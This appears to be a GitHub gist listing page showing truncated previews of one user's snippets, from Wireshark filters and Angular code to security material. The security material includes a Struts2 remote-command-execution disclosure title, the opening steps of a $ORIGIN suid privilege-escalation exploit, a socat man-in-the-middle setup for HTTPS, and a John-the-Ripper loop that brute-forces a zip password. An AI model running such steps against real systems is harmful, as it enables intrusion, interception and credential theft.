Skip to content

Instantly share code, notes, and snippets.

Avatar

KINOSHITA Shinji snj

View GitHub Profile
View gist:7078472
Japan's largest domain name registrar a subsite remote command execution
*Abstract:*
Japan's largest domain name registrar a subsite remote command execution
Details:
Apache struts2 a vulnerability introduced by manipulating parameters
prefixed with "action:"/"redirect:"/"redirectAction:" allows remote command
View gist:7078496
# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit
# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target
# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target
@snj
snj / gist:7079322
Created Oct 21, 2013
swap a and b without tmp var
View gist:7079322
#include <iostream>
void swap(int& a, int& b){
b ^= a; a ^= b; b ^= a;
}
int main(){
int a = 1, b = 2;
swap(a, b);
@snj
snj / gist:7079339
Created Oct 21, 2013
wireshark filters
View gist:7079339
1. ip.addr == 10.0.0.1 [Sets a filter for any packet with 10.0.0.1, as either the source or dest]
2. ip.addr==10.0.0.1 && ip.addr==10.0.0.2 [sets a conversation filter between the two defined IP addresses]
3. http or dns [sets a filter to display all http and dns]
4. tcp.port==4000 [sets a filter for any TCP packet with 4000 as a source or dest port]
5. tcp.flags.reset==1 [displays all TCP resets]
@snj
snj / gist:7079345
Created Oct 21, 2013
decrypting https
View gist:7079345
openssl req -new -x509 -newkey rsa:1024 -out server.pem -keyout server.pem
socat -d -d openssl-listen:10443,reuseaddr,fork,cert=server.pem,verify=0 openssl:$target:443,verify=0
@snj
snj / gist:7079362
Created Oct 21, 2013
debugging android app
View gist:7079362
stop in jp.example.myapp.ExampleActivity.onCreate
adb wait-for-device shell am start -D -a android.intent.action.MAIN -n jp.example.myapp/.ExampleActivity
adb forward tcp:8888 jdwp:`adb jdwp|tail -1`
jdb -attach localhost:8888
View gist:7079756
$ time /opt/john-1.7.9-jumbo-7/run/john -i=digits --stdout|while read pw;do echo $pw;unzip -pqq -P $pw passwd.zip 2>&1 1>/dev/null && break;done
View gist:8276229
// Source: https://groups.google.com/forum/#!topic/angular/hVrkvaHGOfc
// jsFiddle: http://jsfiddle.net/pkozlowski_opensource/PxdSP/14/
// author: Pawel Kozlowski
var myApp = angular.module('myApp', []);
//service style, probably the simplest one
myApp.service('helloWorldFromService', function() {
this.sayHello = function() {
return "Hello, World!"
View tor exit
#!/usr/bin/env python2
import requests
from iso3166 import countries
url="http://example.com/path/to/it"
cookies = dict(session='dcd83eacd7b3518b0d5064ce957d606218cc15616ec72c18cd866a9972aca6fb')
data= requests.get(url,cookies=cookies,verify=False).content
lines = data.split('\n')
flags = []
for i in lines:
if "inactive" in i:
View angular-socket.js
//TODO: make this a module
/**
* # SockJS socket management service
*
* Creates SockJS socket connection to server, re-connects on disconnection,
* and exports hooks to map handlers for various data interactions.
*
*/
angular.module('app').factory